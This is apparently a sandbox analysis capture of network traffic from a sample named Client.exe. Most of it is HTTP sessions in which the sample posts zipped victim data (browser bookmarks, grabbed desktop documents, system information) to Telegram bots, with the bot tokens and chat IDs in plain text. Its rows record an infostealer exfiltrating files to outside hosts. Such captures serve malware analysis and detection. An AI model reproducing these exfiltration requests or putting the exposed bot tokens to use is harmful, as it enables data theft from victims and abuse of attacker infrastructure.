                                                      Data Ascii: {"ok":true,"result":{"message_id":81098,"from":{"id":5344934242,"is_bot":true,"first_name":"Hey skid, add me on discord: _marvim_","username":"HackinGusers_databot"},"chat":{"id":1619136628,"first_name":"GarY","username":"Sunny_Hooda_11","type":"private"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.649715149.154.167.2204436940C:\Users\user\Desktop\Client.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-30 05:14:12 UTC171OUTGET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                      Host: api.telegram.org
                                                      2024-08-30 05:14:13 UTC388INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Fri, 30 Aug 2024 05:14:13 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 322
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      2024-08-30 05:14:13 UTC322INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 30 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 34 34 39 33 34 32 34 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 65 79 20 73 6b 69 64 2c 20 61 64 64 20 6d 65 20 6f 6e 20 64 69 73 63 6f 72 64 3a 20 5f 6d 61 72 76 69 6d 5f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 63 6b 69 6e 47 75 73 65 72 73 5f 64 61 74 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 39 31 33 36 36 32 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 72 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 6e 6e 79 5f 48 6f 6f 64 61 5f 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d
                                                      Data Ascii: {"ok":true,"result":{"message_id":81099,"from":{"id":5344934242,"is_bot":true,"first_name":"Hey skid, add me on discord: _marvim_","username":"HackinGusers_databot"},"chat":{"id":1619136628,"first_name":"GarY","username":"Sunny_Hooda_11","type":"private"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.649716149.154.167.2204436940C:\Users\user\Desktop\Client.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-30 05:14:14 UTC254OUTPOST /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628 HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary="0339a720-379f-47b5-aa7e-aef79f6b64b8"
                                                      Host: api.telegram.org
                                                      Content-Length: 187378
                                                      Expect: 100-continue
                                                      2024-08-30 05:14:14 UTC25INHTTP/1.1 100 Continue
                                                      2024-08-30 05:14:14 UTC40OUTData Raw: 2d 2d 30 33 33 39 61 37 32 30 2d 33 37 39 66 2d 34 37 62 35 2d 61 61 37 65 2d 61 65 66 37 39 66 36 62 36 34 62 38 0d 0a
                                                      Data Ascii: --0339a720-379f-47b5-aa7e-aef79f6b64b8
                                                      2024-08-30 05:14:14 UTC277OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 5c 65 6e 67 69 6e 65 65 72 40 38 34 39 32 32 34 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 65 6e 67 69 6e 65 65 72 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 25 35 43 65 6e 67 69 6e 65 65 72 25
                                                      Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C5b36406dec02be6919cea39af9325731%5Cuser%
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 1c cd a3 86 72 01 00 00 31 04 00 00 17 00 00 00 44
                                                      Data Ascii: PKj0YBrowsers\Edge\PKj0YBrowsers\Google\PKYQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKYr1D
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: 19 39 45 b3 7d a5 b6 ec 26 bb ed 5a df 1f b4 68 c8 df c4 c1 48 81 c0 a0 62 5f 2b a5 25 74 2e ae 6d 2b 39 b7 ae 9d 32 24 c1 ef ef 1f 50 4b 03 04 14 00 00 00 08 00 e9 15 45 57 4d 16 48 75 84 02 00 00 02 04 00 00 36 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 65 73 6b 74 6f 70 5c 53 46 50 55 53 41 46 49 4f 4c 2e 64 6f 63 78 0d 92 49 8e 45 21 0c 03 f7 2d fd 43 01 61 0c 63 48 78 c0 fd 0f d2 ec 90 00 3b 8e 6b ba 2e 53 b9 d8 32 14 a6 2a ec 2b 27 f9 9c f9 e6 9d e1 b3 b0 36 e1 a2 31 92 90 3a 5f fe 44 34 47 b4 d5 b5 8d 9f b2 b1 0c 1b 6f bd 95 14 8c ae f8 7a 53 a0 13 ec 3c fc 15 97 ae bf 40 3c 57 35 41 49 2f 94 3b f5 8b 7e a9 b5 8f 5d 06 6d c0 52 92 c7 99 5a 93 e3 4f 06 88 f6 04 9a 22 9d 5a d7 3e 15 b6 d4
                                                      Data Ascii: 9E}&ZhHb_+%t.m+92$PKEWMHu6Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.docxIE!-CacHx;k.S2*+'61:_D4GozS<@<W5AI/;~]mRZO"Z>
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: cf f8 50 28 67 21 40 f1 fe 07 f1 77 43 07 bc b0 6f c4 53 d7 f0 10 4c 14 93 9e f7 8a 56 2d 56 0f de 9d e4 71 59 84 cb 7a dc b8 9e b0 9e 00 fd d9 60 eb 50 ee dc 11 20 a4 c7 a6 28 b7 75 60 1f 66 d1 78 f9 f2 38 f4 d2 b6 2a 8e 33 a7 1a 9b b6 d8 68 ef 19 ed bb cb d1 f1 23 9d 33 46 5b 9d c6 ed a7 1e a3 0a 87 a7 f8 2d 21 85 1a 6d 9a 5d e4 6c 27 af 46 d0 d9 5f ff 8d aa 59 19 bb f9 56 74 ab f5 5e 9e 05 92 3b 51 6f e9 0a 74 c4 1d 1c 7e ca 0d 96 51 5b a9 f3 35 c8 7d 2c ce 21 47 57 50 5f 1b 8c 21 32 a3 5f 7d c7 9a e5 de 2e 39 3e 64 54 3e 91 66 a9 2d 5b bd 3d 48 ab c7 94 10 b4 5d 9f 82 d3 49 7f 56 dc 25 c3 d0 5e ed 1e 94 1e 71 14 17 44 f9 9c 1b 9a 1c 85 ce a2 cc b9 2d 5f af de f4 86 59 b1 86 92 ca fb 54 02 d8 20 8d ac 99 c5 e8 fd 59 ad b5 45 68 b3 81 eb 7e 6b e0 d3 72
                                                      Data Ascii: P(g!@wCoSLV-VqYz`P (u`fx8*3h#3F[-!m]l'F_YVt^;Qot~Q[5},!GWP_!2_}.9>dT>f-[=H]IV%^qD-_YT YEh~kr
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: ba 24 cd 8d 19 9f 5b b6 df 5a c5 75 5b 52 4c 62 4b 31 41 d8 76 d3 0a 6c c3 61 65 7b 6d 3d 33 52 50 4c 52 f2 c3 6e d5 fc 86 bb f8 49 94 cb 8b 62 19 b0 87 2c c5 29 dd d4 e8 9b c2 b1 bd c7 81 d7 da 4b 13 cc 16 20 4f a3 d5 32 3b e6 ce a6 00 3b 10 35 02 2b 47 d1 9e 80 56 9f 51 50 ba af db bd 33 9e 2b 62 87 d9 18 ad 3d a4 ea 2b ed be c9 5e ad 54 4d 9c 7a ca d0 f3 34 ba cf 9d ca 5e eb b3 0e ef b9 56 1d 2e c0 39 a8 66 f2 76 c4 2c d7 57 57 8c 85 ee 20 9c 33 9d 22 e5 8e c7 a1 c9 db 32 38 44 aa 45 a0 96 cd 9a 07 b5 b2 3b ee 34 9f 82 98 26 de b9 6a 0d 1e be 9a f6 d5 71 dc 7a db c3 b2 6b 8a 64 d3 8e a0 eb 2e 3e 02 e5 7a 0e 4e 27 ea dc a5 5d f2 b8 f2 6c ef 80 78 c2 75 46 0e c5 af f1 e1 69 1a d2 96 96 e3 33 2d b9 4b 76 b4 a9 de 6b 29 03 1a a6 7b 6b 67 3c a2 4c f2 a8 88
                                                      Data Ascii: $[Zu[RLbK1Avlae{m=3RPLRnIb,)K O2;;5+GVQP3+b=+^TMz4^V.9fv,WW 3"28DE;4&jqzkd.>zN']lxuFi3-Kvk){kg<L
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: 0f af 2b dc 90 cc a4 1e 4b 0c dc 58 fb ef a3 d0 10 37 26 f4 e3 3d b6 6a fb 91 63 59 61 aa a5 8a 77 c1 35 dd 1e ec 97 c1 e8 de af a6 ef 24 5d d7 17 75 df c1 ed 7b a2 25 52 5d ee ed 56 31 9b e0 ee 07 1b ab f2 e3 52 a2 e6 33 91 1d 31 68 fe 9a c3 dc c4 c9 8b 7b 4a 3d 46 1c 57 9a 5b 15 1d 22 c4 1a 41 29 38 3e 41 5a 7a 3e 96 9e 58 cb 53 f6 56 ec 9a 0b 7e b1 a9 68 8c 90 fd 76 ee f3 d8 66 d3 4c 33 28 7e c5 88 85 b2 e7 89 19 a7 29 7a 75 3a 44 99 95 fe c4 6c 43 04 ec 1a 1f c7 77 ac c9 78 4f be 6d 47 eb 6a a3 86 39 87 47 f2 a9 d3 79 32 2b 56 ad eb 55 5c f2 0e 63 af 82 5f ab 5a f4 34 f8 1d 71 a6 05 1f 97 4c 63 55 f9 82 22 57 0a 4a 8c a3 52 3f 47 e2 31 98 e7 7e bc e4 28 35 3d db 5a 5a 78 68 e4 1a bd 7d d7 a1 4e db e5 4b cb 82 89 7a db b5 d2 23 05 df b5 f2 d9 55 e3 38
                                                      Data Ascii: +KX7&=jcYaw5$]u{%R]V1R31h{J=FW["A)8>AZz>XSV~hvfL3(~)zu:DlCwxOmGj9Gy2+VU\c_Z4qLcU"WJR?G1~(5=ZZxh}NKz#U8
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: 40 07 90 b3 02 00 00 67 3d 00 00 12 00 00 00 53 79 73 74 65 6d 5c 57 69 6e 64 6f 77 73 2e 74 78 74 dd 5b db 8e 9a 50 14 7d d6 af e0 b1 7d 28 39 77 c0 37 c7 11 75 2e c6 5b 83 4e 48 8c e8 a9 63 bd 60 01 8b f6 eb 4b cd 8c 71 d2 4e 9a b4 3e b8 ce ab c0 f1 2c d8 6b ed b5 f7 86 76 f5 b1 5e b1 ea cb a7 9e df 99 75 bb ed fe b0 fe bd 11 3c 94 4b 83 d6 e0 a1 38 d2 d6 b9 35 98 44 d6 27 ab 11 c7 f3 95 b6 6a cf 49 bc d6 e5 52 a7 75 5b b1 98 74 49 b9 54 1f 16 27 d6 2a 61 27 89 e7 c9 64 6d f9 8b 95 4e ad 0f 7b 57 7d 0c a3 a4 de 5d a5 b5 20 98 cc 77 bb 7e ef 87 1f 35 6e 83 aa 3f f5 3f 77 82 69 de 1c 6e ef 9e ee 9b d1 7d f1 5f a3 cd 5d b2 1a 35 1e b7 bd 64 f7 6d ee 7f 6d af 77 37 a3 c9 b4 93 0c a3 28 59 26 cb ae 1f fe b6 4d 5b ef 75 b9 dc fe 2f 0c 92 2a 81 8e 81 ba f8 cf
                                                      Data Ascii: @g=System\Windows.txt[P}}(9w7u.[NHc`KqN>,kv^u<K85D'jIRu[tIT'*a'dmN{W}] w~5n??win}_]5dmmw7(Y&M[u/*
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: 0a 8b ef 73 d1 4a 95 71 15 74 cf 4f d7 0a 4b c8 c8 f1 3b a0 92 1b ec c6 0e 86 0f 84 de fd d5 a7 7d 1f cc 99 77 9a 8f 77 2c 5f 93 df fe bc ff e2 64 f1 15 01 f0 1b 23 00 11 18 fc 35 9e 8b 7e 5e a0 ff a7 1f a4 f2 9d 23 aa 17 d4 0c 3d d2 37 dd c3 6f d9 d8 a0 44 2e 03 4f 23 5d d3 5c 8c 7f c3 bd 0e ed 6d dd 8e d4 ee cb 50 11 a7 42 9c 7b 4c 9f ba 73 a4 bb a2 ad 9f c8 a7 9f af e3 a2 cb 36 8a 1d 41 6a e5 b8 89 5e 72 6f be b3 63 9e 59 6a 2f 3c 31 d1 f5 f2 cb 9d 5e 4e 91 2c 62 40 e8 af 76 89 73 92 35 ec ec 84 ba 01 b6 be b4 6b f2 ac b6 3a f6 af 44 df 8d 68 da cb 32 a7 23 66 6d bd 70 a1 c9 db 7d 9d 13 2f c7 d7 83 a6 1b b6 13 0b 06 82 42 24 2d 4a 57 f6 ca 47 d6 e7 6c 3e e9 45 15 97 54 9c fb 2a 67 97 b0 dd 47 1a 1a db 0c bd 08 86 52 d8 d3 14 07 3c a2 cd f9 f0 d8 8a ac
                                                      Data Ascii: sJqtOK;}ww,_d#5~^#=7oD.O#]\mPB{Ls6Aj^rocYj/<1^N,b@vs5k:Dh2#fmp}/B$-JWGl>ET*gGR<
                                                      2024-08-30 05:14:14 UTC16355OUTData Raw: fa 7a 9d 47 08 7c 09 32 85 3a 2e 54 f3 18 14 fc fe 7d 4f 4a 6a 4f 2a dd 56 98 be d4 d8 c1 e6 a4 65 5d 96 10 41 de da 47 fb 03 09 51 a9 bf b4 a8 d2 b0 40 35 13 e7 ae f9 4a 98 ac ab b4 e1 39 a0 c4 18 a3 64 59 30 71 2c aa 2d ef 72 fd 58 d9 86 26 f3 e8 e0 0b ae e8 ab e3 d6 f3 aa b4 e7 6f 15 c3 15 7e 29 48 df df b2 6a 8c 5e 63 58 44 da 5a 2d e5 58 35 c5 24 1f 23 5f cb ac 1a c6 ae f6 2b d5 ba 12 ee 14 3d a2 f4 41 2f bf eb 96 a5 7b ed c6 e8 c1 c0 01 26 72 62 f5 b3 46 c3 bb 60 96 f7 48 b4 3f b9 90 78 be f0 48 7f 70 f5 25 bd b2 2d a6 32 4c d3 d6 4a a7 c4 bb ad 18 99 0c 57 eb 38 ae ae 67 93 21 f4 77 0e 7f ee ef 17 e7 d6 a7 dd b5 1b 81 5f 7e 21 a4 27 fe 85 4d 75 26 5e 47 37 25 d9 79 18 6a 12 cc 01 cd 5e f8 46 59 93 bc 5f fb 1d 7f 85 d6 98 10 23 9b cb be 4e 24 aa 2f
                                                      Data Ascii: zG|2:.T}OJjO*Ve]AGQ@5J9dY0q,-rX&o~)Hj^cXDZ-X5$#_+=A/{&rbF`H?xHp%-2LJW8g!w_~!'Mu&^G7%yj^FY_#N$/
                                                      2024-08-30 05:14:16 UTC928INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Fri, 30 Aug 2024 05:14:16 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 540
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      {"ok":true,"result":{"message_id":81100,"from":{"id":5344934242,"is_bot":true,"first_name":"Hey skid, add me on discord: _marvim_","username":"HackinGusers_databot"},"chat":{"id":1619136628,"first_name":"GarY","username":"Sunny_Hooda_11","type":"private"},"date":1724994855,"document":{"file_name":"C_UsersuserAppDataLocal5b36406dec02be6919cea39af9325731engin.zip","mime_type":"application/zip","file_id":"BQACAgUAAxkDAAEBPMxm0VUn3nsvI-l6b95dN9Wtk4GAHgACwhIAAhXSiVaisilSuCC-5TUE","file_unique_id":"AgADwhIAAhXSiVY","file_size":187017}}}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.649721149.154.167.2204436940C:\Users\user\Desktop\Client.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-30 05:14:16 UTC254OUTPOST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary="4918a032-b9c9-40e8-81a3-dfca8ed2bf78"
                                                      Host: api.telegram.org
                                                      Content-Length: 187378
                                                      Expect: 100-continue
                                                      2024-08-30 05:14:17 UTC25INHTTP/1.1 100 Continue
                                                      2024-08-30 05:14:17 UTC40OUTData Raw: 2d 2d 34 39 31 38 61 30 33 32 2d 62 39 63 39 2d 34 30 65 38 2d 38 31 61 33 2d 64 66 63 61 38 65 64 32 62 66 37 38 0d 0a
                                                      Data Ascii: --4918a032-b9c9-40e8-81a3-dfca8ed2bf78
                                                      2024-08-30 05:14:17 UTC277OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 5c 65 6e 67 69 6e 65 65 72 40 38 34 39 32 32 34 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 65 6e 67 69 6e 65 65 72 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 25 35 43 65 6e 67 69 6e 65 65 72 25
                                                      Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C5b36406dec02be6919cea39af9325731%5Cuser%
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 1c cd a3 86 72 01 00 00 31 04 00 00 17 00 00 00 44
                                                      Data Ascii: PKj0YBrowsers\Edge\PKj0YBrowsers\Google\PKYQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKYr1D
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: 19 39 45 b3 7d a5 b6 ec 26 bb ed 5a df 1f b4 68 c8 df c4 c1 48 81 c0 a0 62 5f 2b a5 25 74 2e ae 6d 2b 39 b7 ae 9d 32 24 c1 ef ef 1f 50 4b 03 04 14 00 00 00 08 00 e9 15 45 57 4d 16 48 75 84 02 00 00 02 04 00 00 36 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 65 73 6b 74 6f 70 5c 53 46 50 55 53 41 46 49 4f 4c 2e 64 6f 63 78 0d 92 49 8e 45 21 0c 03 f7 2d fd 43 01 61 0c 63 48 78 c0 fd 0f d2 ec 90 00 3b 8e 6b ba 2e 53 b9 d8 32 14 a6 2a ec 2b 27 f9 9c f9 e6 9d e1 b3 b0 36 e1 a2 31 92 90 3a 5f fe 44 34 47 b4 d5 b5 8d 9f b2 b1 0c 1b 6f bd 95 14 8c ae f8 7a 53 a0 13 ec 3c fc 15 97 ae bf 40 3c 57 35 41 49 2f 94 3b f5 8b 7e a9 b5 8f 5d 06 6d c0 52 92 c7 99 5a 93 e3 4f 06 88 f6 04 9a 22 9d 5a d7 3e 15 b6 d4
                                                      Data Ascii: 9E}&ZhHb_+%t.m+92$PKEWMHu6Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.docxIE!-CacHx;k.S2*+'61:_D4GozS<@<W5AI/;~]mRZO"Z>
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: cf f8 50 28 67 21 40 f1 fe 07 f1 77 43 07 bc b0 6f c4 53 d7 f0 10 4c 14 93 9e f7 8a 56 2d 56 0f de 9d e4 71 59 84 cb 7a dc b8 9e b0 9e 00 fd d9 60 eb 50 ee dc 11 20 a4 c7 a6 28 b7 75 60 1f 66 d1 78 f9 f2 38 f4 d2 b6 2a 8e 33 a7 1a 9b b6 d8 68 ef 19 ed bb cb d1 f1 23 9d 33 46 5b 9d c6 ed a7 1e a3 0a 87 a7 f8 2d 21 85 1a 6d 9a 5d e4 6c 27 af 46 d0 d9 5f ff 8d aa 59 19 bb f9 56 74 ab f5 5e 9e 05 92 3b 51 6f e9 0a 74 c4 1d 1c 7e ca 0d 96 51 5b a9 f3 35 c8 7d 2c ce 21 47 57 50 5f 1b 8c 21 32 a3 5f 7d c7 9a e5 de 2e 39 3e 64 54 3e 91 66 a9 2d 5b bd 3d 48 ab c7 94 10 b4 5d 9f 82 d3 49 7f 56 dc 25 c3 d0 5e ed 1e 94 1e 71 14 17 44 f9 9c 1b 9a 1c 85 ce a2 cc b9 2d 5f af de f4 86 59 b1 86 92 ca fb 54 02 d8 20 8d ac 99 c5 e8 fd 59 ad b5 45 68 b3 81 eb 7e 6b e0 d3 72
                                                      Data Ascii: P(g!@wCoSLV-VqYz`P (u`fx8*3h#3F[-!m]l'F_YVt^;Qot~Q[5},!GWP_!2_}.9>dT>f-[=H]IV%^qD-_YT YEh~kr
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: ba 24 cd 8d 19 9f 5b b6 df 5a c5 75 5b 52 4c 62 4b 31 41 d8 76 d3 0a 6c c3 61 65 7b 6d 3d 33 52 50 4c 52 f2 c3 6e d5 fc 86 bb f8 49 94 cb 8b 62 19 b0 87 2c c5 29 dd d4 e8 9b c2 b1 bd c7 81 d7 da 4b 13 cc 16 20 4f a3 d5 32 3b e6 ce a6 00 3b 10 35 02 2b 47 d1 9e 80 56 9f 51 50 ba af db bd 33 9e 2b 62 87 d9 18 ad 3d a4 ea 2b ed be c9 5e ad 54 4d 9c 7a ca d0 f3 34 ba cf 9d ca 5e eb b3 0e ef b9 56 1d 2e c0 39 a8 66 f2 76 c4 2c d7 57 57 8c 85 ee 20 9c 33 9d 22 e5 8e c7 a1 c9 db 32 38 44 aa 45 a0 96 cd 9a 07 b5 b2 3b ee 34 9f 82 98 26 de b9 6a 0d 1e be 9a f6 d5 71 dc 7a db c3 b2 6b 8a 64 d3 8e a0 eb 2e 3e 02 e5 7a 0e 4e 27 ea dc a5 5d f2 b8 f2 6c ef 80 78 c2 75 46 0e c5 af f1 e1 69 1a d2 96 96 e3 33 2d b9 4b 76 b4 a9 de 6b 29 03 1a a6 7b 6b 67 3c a2 4c f2 a8 88
                                                      Data Ascii: $[Zu[RLbK1Avlae{m=3RPLRnIb,)K O2;;5+GVQP3+b=+^TMz4^V.9fv,WW 3"28DE;4&jqzkd.>zN']lxuFi3-Kvk){kg<L
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: 0f af 2b dc 90 cc a4 1e 4b 0c dc 58 fb ef a3 d0 10 37 26 f4 e3 3d b6 6a fb 91 63 59 61 aa a5 8a 77 c1 35 dd 1e ec 97 c1 e8 de af a6 ef 24 5d d7 17 75 df c1 ed 7b a2 25 52 5d ee ed 56 31 9b e0 ee 07 1b ab f2 e3 52 a2 e6 33 91 1d 31 68 fe 9a c3 dc c4 c9 8b 7b 4a 3d 46 1c 57 9a 5b 15 1d 22 c4 1a 41 29 38 3e 41 5a 7a 3e 96 9e 58 cb 53 f6 56 ec 9a 0b 7e b1 a9 68 8c 90 fd 76 ee f3 d8 66 d3 4c 33 28 7e c5 88 85 b2 e7 89 19 a7 29 7a 75 3a 44 99 95 fe c4 6c 43 04 ec 1a 1f c7 77 ac c9 78 4f be 6d 47 eb 6a a3 86 39 87 47 f2 a9 d3 79 32 2b 56 ad eb 55 5c f2 0e 63 af 82 5f ab 5a f4 34 f8 1d 71 a6 05 1f 97 4c 63 55 f9 82 22 57 0a 4a 8c a3 52 3f 47 e2 31 98 e7 7e bc e4 28 35 3d db 5a 5a 78 68 e4 1a bd 7d d7 a1 4e db e5 4b cb 82 89 7a db b5 d2 23 05 df b5 f2 d9 55 e3 38
                                                      Data Ascii: +KX7&=jcYaw5$]u{%R]V1R31h{J=FW["A)8>AZz>XSV~hvfL3(~)zu:DlCwxOmGj9Gy2+VU\c_Z4qLcU"WJR?G1~(5=ZZxh}NKz#U8
                                                      2024-08-30 05:14:17 UTC16355OUTData Raw: 40 07 90 b3 02 00 00 67 3d 00 00 12 00 00 00 53 79 73 74 65 6d 5c 57 69 6e 64 6f 77 73 2e 74 78 74 dd 5b db 8e 9a 50 14 7d d6 af e0 b1 7d 28 39 77 c0 37 c7 11 75 2e c6 5b 83 4e 48 8c e8 a9 63 bd 60 01 8b f6 eb 4b cd 8c 71 d2 4e 9a b4 3e b8 ce ab c0 f1 2c d8 6b ed b5 f7 86 76 f5 b1 5e b1 ea cb a7 9e df 99 75 bb ed fe b0 fe bd 11 3c 94 4b 83 d6 e0 a1 38 d2 d6 b9 35 98 44 d6 27 ab 11 c7 f3 95 b6 6a cf 49 bc d6 e5 52 a7 75 5b b1 98 74 49 b9 54 1f 16 27 d6 2a 61 27 89 e7 c9 64 6d f9 8b 95 4e ad 0f 7b 57 7d 0c a3 a4 de 5d a5 b5 20 98 cc 77 bb 7e ef 87 1f 35 6e 83 aa 3f f5 3f 77 82 69 de 1c 6e ef 9e ee 9b d1 7d f1 5f a3 cd 5d b2 1a 35 1e b7 bd 64 f7 6d ee 7f 6d af 77 37 a3 c9 b4 93 0c a3 28 59 26 cb ae 1f fe b6 4d 5b ef 75 b9 dc fe 2f 0c 92 2a 81 8e 81 ba f8 cf
                                                      Data Ascii: @g=System\Windows.txt[P}}(9w7u.[NHc`KqN>,kv^u<K85D'jIRu[tIT'*a'dmN{W}] w~5n??win}_]5dmmw7(Y&M[u/*
